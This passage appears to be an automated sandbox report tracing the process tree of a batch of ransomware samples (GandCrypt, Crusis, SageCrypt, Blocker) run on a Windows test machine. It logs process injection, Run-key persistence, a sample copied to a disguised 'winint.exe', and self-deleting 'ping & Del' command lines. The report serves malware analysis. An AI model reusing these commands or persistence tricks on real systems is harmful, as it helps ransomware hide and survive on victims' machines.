PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 1748 wrote to memory of 2636	1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe	49
PID 1748 wrote to memory of 2636	1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe	49
PID 1748 wrote to memory of 2636	1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe	49
PID 1748 wrote to memory of 2636	1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe	49
PID 536 wrote to memory of 596	536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe	51
PID 536 wrote to memory of 596	536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe	51
PID 536 wrote to memory of 596	536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe	51
PID 536 wrote to memory of 596	536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe	51
PID 536 wrote to memory of 1820	536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe	53
PID 536 wrote to memory of 1820	536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe	53

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Process not Found

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Process not Found

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00353.7z"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1916

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Blocker.gen-df46d7a13fb63c2a7575a650b83a090f24ae1b8766be004a4c0da3e2cf92aaf9.exe
  HEUR-Trojan-Ransom.MSIL.Blocker.gen-df46d7a13fb63c2a7575a650b83a090f24ae1b8766be004a4c0da3e2cf92aaf9.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:484
- - C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
    "C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
  - - C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
      "C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2080
    - - C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1800
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1516
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 1000
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:864
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy "HEUR-Trojan-Ransom.MSIL.Blocker.gen-df46d7a13fb63c2a7575a650b83a090f24ae1b8766be004a4c0da3e2cf92aaf9.exe" "C:\Users\Admin\AppData\Local\winint.exe"
    3⤵
    PID:2376
- - C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
    "C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
  - - C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
      "C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
      4⤵
      Executes dropped EXE
      PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Local\winint.exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:888
  - - C:\Users\Admin\AppData\Local\winint.exe
      "C:\Users\Admin\AppData\Local\winint.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:2392
- C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
  HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- - C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
    "HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
      "C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:552
    - - C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda\heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
        5⤵
        Executes dropped EXE
        
        PID:780
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:1488
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 1000
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1404
- C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
  HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- - C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
    "HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:700
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Temps\svcc.exe"
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2140
      - C:\Users\Admin\AppData\Roaming\Temps\svcc.exe
        
        C:\Users\Admin\AppData\Roaming\Temps\svcc.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:1756
        
        C:\Users\Admin\AppData\Roaming\Temps\svcc.exe
        
        "C:\Users\Admin\AppData\Roaming\Temps\svcc.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2000
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1456
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
        9⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2964
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2964 CREDAT:275457 /prefetch:2
        10⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2744
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2728
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:308
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2452
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2016
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:828
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1108
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:292
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:912
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2724
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:780
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:928
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1624
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:616
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:852
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1404
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3100
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3108
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3180
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3196
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3220
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3236
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3244
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3260
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3276
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3332
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3364
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3372
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3388
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3460
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3468
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3516
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
